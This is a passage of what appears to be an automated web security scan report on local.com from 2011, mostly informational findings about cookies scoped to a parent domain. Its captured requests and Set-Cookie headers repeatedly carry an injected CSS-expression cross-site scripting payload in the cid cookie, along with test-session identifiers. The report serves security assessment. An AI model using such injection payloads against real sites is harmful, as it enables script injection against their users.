Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /error.aspx?aspxerrorpath=/sitetemplates/local.com/dialogs/network.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 202
Date: Thu, 03 Feb 2011 16:53:41 GMT
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:41 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.aspx%3faspxerrorpath%3d%2fsitetemplates%2flocal.com%2fdialogs%2fnetwork.aspx">here</a>.</h2>
</body></html>
...[SNIP]...

7.24. http://www.local.com/dialogs/register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/register.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.25. http://www.local.com/events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.26. http://www.local.com/events/category/music/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.28. http://www.local.com/events/category/sports/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.29. http://www.local.com/faq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/faq.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.30. http://www.local.com/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.31. http://www.local.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=9e9962ee-715a-422c-a9da-c41c1b56ab77&expdate=634349085044720371&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:04 GMT; path=/
localcom_s=cid=506&exp=634323183044720371; domain=local.com; expires=Thu, 03-Feb-2011 16:25:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.32. http://www.local.com/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.33. http://www.local.com/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.34. http://www.local.com/sitemap/chicago-il.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/chicago-il.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.35. http://www.local.com/sitemap/los-angeles-ca.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/los-angeles-ca.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.36. http://www.local.com/sitemap/new-york-ny.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/new-york-ny.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.37. http://www.local.com/terms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.38. http://www.local.com/topics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.39. http://www.local.com/ver1.0/Direct/JavascriptSDKProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Direct/JavascriptSDKProxy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; domain=local.com; expires=Fri, 03-Feb-2012 16:00:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/JavascriptSDKProxy HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Cache-Control: public, max-age=86400
Expires: Fri, 04 Feb 2011 12:06:43 GMT
Last-Modified: Thu, 03 Feb 2011 12:06:43 GMT
ETag: -19638594
Vary: Host
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:00:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Set-Cookie: anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; domain=local.com; expires=Fri, 03-Feb-2012 16:00:49 GMT; path=/
Content-Length: 68758

...
var PluckSDK=(function(){var extend=function(obj,options){for(var v in options){obj[v]=options[v];}
return obj;};function instance(obj,constructor,objectType,options){if(!(obj instanceof construct
...[SNIP]...

7.40. http://www.local.com/ver1.0/Direct/Jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:01:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 147

RequestBatch.callbacks.daapiCallback0({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:01:41:469 AM"}],"Responses":[]}});

7.41. http://www.local.com/ver1.0/Photo/Upload previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Photo/Upload

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Photo/Upload HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 16:49:48 GMT
Content-Length: 102
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

<script language="javascript">
document.domain = "local.com";
</script>
Error: No photo specified

7.42. http://www.local.com/ver1.0/ReviewPage.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/ReviewPage.app

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=104826937&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
